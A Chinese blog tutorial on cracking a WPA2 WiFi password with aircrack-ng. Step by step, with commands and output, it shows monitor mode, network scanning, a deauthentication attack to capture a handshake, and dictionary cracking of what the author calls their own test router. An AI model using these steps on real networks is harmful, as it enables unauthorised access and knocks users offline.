Marksec's Blog.

无线wifi破解

字数统计: 2k阅读时长: 10 min
2017/02/16 Share

WiFi在我们生活中扮演不可或缺的角色,对于WiFi安全也是人们关注的热点之一,现在教大家利用软件进行WiFi破解渗透,注意WiFi破解技术只用于技术交流,生活中破解他人WiFi属于侵权行为。

准备工作

我们需要一台电脑,一块无线网卡,一个kail系统,如果你是Windows系统,你可以将kail系统安装在虚拟机里,然后kail虚拟机导入你的无线网卡就可以完成前期准备,小米WiFi和360WiFi都可以变为无线网卡使用,如果你的Linux系统就可以直接使用了,我使用的是archLinux的发行版manjaro,我们使用的软件是aircrack-ng 这一款WiFi破解软件,它主要破解的是wpa/wpa2的WiFi,对于wpe的WiFi现在已经绝迹,这里就不说了。

破解步骤

查看自己的无线网

airmon-ng

[makai@manjaro ~]$ sudo airmon-ng  //sudo为提为root权限,root用户无需sudo
PHY     Interface       Driver          Chipset
phy0    wlp3s0          rtl8192ce       Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01)

上面的命令是列出支持监控模式的无线网卡,wlp3s0即为我们的网卡,如果没有任何输出,表示无线网卡不支持监控模式。你可以看到我的wlan0支持监控模式

开启无线网卡的监控模式

airmon-ng start wlp3s0

[makai@manjaro ~]$ sudo airmon-ng start wlp3s0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  470 avahi-daemon
  472 NetworkManager
  484 avahi-daemon
  523 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlp3s0          rtl8192ce       Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlp3s0 on [phy0]wlp3s0mon)//开启监控后,系统自动将wlp3s0转为了wlp3s0mon
                (mac80211 station mode vif disabled for [phy0]wlp3s0)

查看当前WiFi网络

airodump-ng wlp3s0mon

[CH  9 ][ Elapsed: 24 s ][ 2016-11-02 16:22 ]

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:87:46:20:08:1F  -46       57       49    2   6  54e. WPA2 CCMP   PSK  360
00:36:76:11:61:A7  -53       50      999   49   1  54e. WPA2 CCMP   PSK  mima1-8
F0:B4:29:3B:E0:65  -47       47      628    0   1  54e. WPA2 CCMP   PSK  redian
8C:F2:28:26:CE:AA  -44       38       26    0  13  54e  WPA2 CCMP   PSK  MERCURY_CEAA  //这是我们的实验路由器
B0:D5:9D:6D:2E:F8  -53       58      338   65  11  54e. WPA2 CCMP   PSK  360免费WiFi-F8
B0:D5:9D:80:C0:B0  -47       47        1    0   6  54e. WPA2 CCMP   PSK  360免费WiFi-B0
D4:83:04:F9:27:3A  -56       50       12    0  11  54e. WPA2 CCMP   PSK  FAST
30:FC:68:23:44:C4  -64       28        9    0   1  54e. WPA2 CCMP   PSK  CMCC-02

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

(not associated)   B6:F6:EA:9D:63:F4  -21    0 - 1      4        4
(not associated)   20:82:C0:10:FA:D9  -77    0 - 1      0        3  XiaoFangJia
(not associated)   AC:36:13:79:54:2C  -81    0 - 1      0        1
00:87:46:20:08:1F  CC:3A:61:C9:15:77  -37    0 - 1      0        5
00:87:46:20:08:1F  A4:44:D1:32:25:27  -33    0 - 1     21       49
00:87:46:20:08:1F  C0:EE:FB:06:2B:9A  -47    0 - 1e     0       48
00:36:76:11:61:A7  9C:2A:70:C9:C3:53  -35    1e- 1e  1173      907
00:36:76:11:61:A7  74:E5:0B:A3:C6:B2  -46    1e- 1e   296       90
00:36:76:11:61:A7  90:C1:15:F1:86:C9  -55    0 - 1     12        4
00:36:76:11:61:A7  C4:43:8F:F2:88:96  -71    1e- 1      0       13
F0:B4:29:3B:E0:65  60:F1:89:60:6D:CA  -34    1e- 1e     0      627
8C:F2:28:26:CE:AA  68:3E:34:3C:47:C0  -47    1e- 1      0       54
B0:D5:9D:6D:2E:F8  38:BC:1A:EC:34:62  -55    1e- 1e    44      340
D4:83:04:F9:27:3A  38:BC:1A:23:B1:51  -67    0 - 1    100        7
D4:83:04:F9:27:3A  D0:7A:B5:57:60:21  -69    0 - 1      0        1

上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等,要记住要破解wifi的频道号(CH)和BSSID
ctrl+c结束进程,ctrl+s暂停,ctrl+q继续,可以利用这三个快捷键进行操作,当前我们可以ctrl+c停止

抓取握手包

airodump-ng -c 13 -w test wlp3s0mon
-c为CH即为信道,-w 为保存的位置,-w test为将数据包保存在test文件

CH 13 ][ Elapsed: 24 s ][ 2016-11-02 16:44 ][ fixed channel wlp3s0mon: 4

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

F0:B4:29:3B:E0:65  -46   1       30      522    0   1  54e. WPA2 CCMP   PSK  redian
B0:D5:9D:80:C0:B0  -47   0       18        0    0   6  54e. WPA2 CCMP   PSK  360免费WiFi-B0
8C:F2:28:26:CE:AA  -49  43       95       22    0  13  54e  WPA2 CCMP   PSK  MERCURY_CEAA   //我们的路由器mac
00:36:76:11:61:A7  -47   0       25      117    1   1  54e. WPA2 CCMP   PSK  mima1-8
00:87:46:20:08:1F  -53   5       26       26    0   6  54e. WPA2 CCMP   PSK  360
D4:83:04:F9:27:3A  -57   0      115       32    0  11  54e. WPA2 CCMP   PSK  FAST
30:FC:68:23:44:C4  -58   0       28        6    1   1  54e. WPA2 CCMP   PSK  CMCC-02
B0:D5:9D:6D:2E:F8  -63   9      112      112   12  11  54e. WPA2 CCMP   PSK  360免费WiFi-F8

BSSID              STATION(手机mac地址) PWR   Rate    Lost    Frames  Probe

(not associated)   00:19:86:31:94:24  -47    0 - 1      0        2
(not associated)   A4:17:31:4F:0C:5F  -47    0 - 1     15        6
(not associated)   8A:84:7C:92:A9:53  -51    0 - 1      2        3
(not associated)   68:3E:34:3C:91:58  -55    0 - 1     13        7
(not associated)   AC:B5:7D:20:46:D1  -59    0 - 1      0       18  CMCC-01
F0:B4:29:3B:E0:65  60:F1:89:60:6D:CA  -37    1e- 1e     0      522
8C:F2:28:26:CE:AA  68:3E:34:3C:47:C0  -17    1e- 1      0       27    //路由器链接的手机mac
00:36:76:11:61:A7  9C:2A:70:C9:C3:53  -34    1e- 1e     3      114
00:36:76:11:61:A7  24:0A:64:9C:E9:91  -47    0 - 1e     0        4
00:36:76:11:61:A7  90:C1:15:F1:86:C9  -54    0 - 1e     0        3
00:36:76:11:61:A7  C4:43:8F:F2:88:96  -77    0 - 1      0        1
00:87:46:20:08:1F  A4:44:D1:32:25:27  -47    0 - 1e     0       56
D4:83:04:F9:27:3A  38:BC:1A:23:B1:51  -69    0 - 1    961       52
D4:83:04:F9:27:3A  08:57:00:C4:42:3A  -65    0 - 1e     0        5  FAST
30:FC:68:23:44:C4  20:2D:07:CE:8C:CE  -79    0 - 1e   228       12
30:FC:68:23:44:C4  70:EC:E4:BF:C2:9F  -64    0 - 1      0        1

强制使连接到wifi的设备重新连接路由器

aireplay-ng -0 1 -a 8C:F2:28:26:CE:AA -c 68:3E:34:3C:47:C0 wlp3s0mon

-0指定发送反认证包的个数 -a指定无线路由器BSSID -c指定强制断开的设置

[makai@manjaro ~]$ sudo aireplay-ng -0 1 -a  8C:F2:28:26:CE:AA -c 68:3E:34:3C:47:C0 wlp3s0mon
16:52:46  Waiting for beacon frame (BSSID: 8C:F2:28:26:CE:AA) on channel 13
16:52:47  Sending 64 directed DeAuth. STMAC: [68:3E:34:3C:47:C0] [ 8|57 ACKs]

CH 13 ][ Elapsed: 55 mins ][ 2016-11-02 18:26 ][ WPA handshake: 8C:F2:28:26:CE:AA //我们可以看到这里变成了handshake,就是抓完包了
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

掉线是为了让上网设备断网重新连接WiFi,这样我们就可以抓取它连接路由器时候的握手包了

破解WiFi

aircrack-ng -w 1.txt test-01.cap
1.txt为你的密码字典test-01.cap就是之前截取的包

[makai@manjaro ~]$ sudo aircrack-ng -w 1.txt test-01.cap
Opening test-01.cap
Read 714 packets.

   #  BSSID              ESSID                     Encryption

   1  8C:F2:28:26:CE:AA  MERCURY_CEAA              WPA (1 handshake)
   2  B0:D5:9D:6D:2E:F8  360免费WiFi-F8          WPA (0 handshake)
   3  D4:83:04:F9:27:3A  FAST                      WPA (0 handshake)

Index number of target network ? 1  //选择1就是破解我们的目标路由器

Aircrack-ng 1.2 rc4

[00:00:15] 16084/19326 keys tested (1106.08 k/s)

Time left: 2 seconds                                      83.22%

  KEY FOUND! [ 19940515 ]  //我们目标路由器的密码


Master Key     : 69 F5 C8 9C 45 26 03 23 08 FE 27 03 D8 83 6C 0A
4B 26 E1 AE 07 99 B6 11 51 1A 0F 25 AD 22 E9 5A

Transient Key  : DC A9 11 93 44 A9 6A 8E 9D 79 4C 80 4F 61 3D 8C
B8 C0 5C 00 B0 D0 E8 99 E7 C6 C6 FB 6D D4 D3 35
94 0A A3 3B 17 00 08 F7 BA F0 4D 5E 9E B7 2C 3F
22 89 70 A6 36 1E 63 D2 64 8E 52 79 FD 41 57 70

EAPOL HMAC     : FD 4E CB 71 B6 9C BB E6 A2 62 6F 92 A5 54 F8 85

关闭网卡监听模式

airmon-ng stop wlp3s0


这就是WiFi破解的全过程,当然我们还有其他的破解方法,比如ping破解法,但是总的来说使用aircrack-ng来破解WiFi是主流,同时破解字典也是十分重要的,最后再次说明,WiFi破解只能拿来技术交流,不要轻易破解他人WiFi

*本文为原创,转载请注明出处
CATALOG
  1. 1. 准备工作
  2. 2. 破解步骤
    1. 2.1. 查看自己的无线网
    2. 2.2. 开启无线网卡的监控模式
    3. 2.3. 查看当前WiFi网络
    4. 2.4. 抓取握手包
    5. 2.5. 强制使连接到wifi的设备重新连接路由器
    6. 2.6. 破解WiFi
    7. 2.7. 关闭网卡监听模式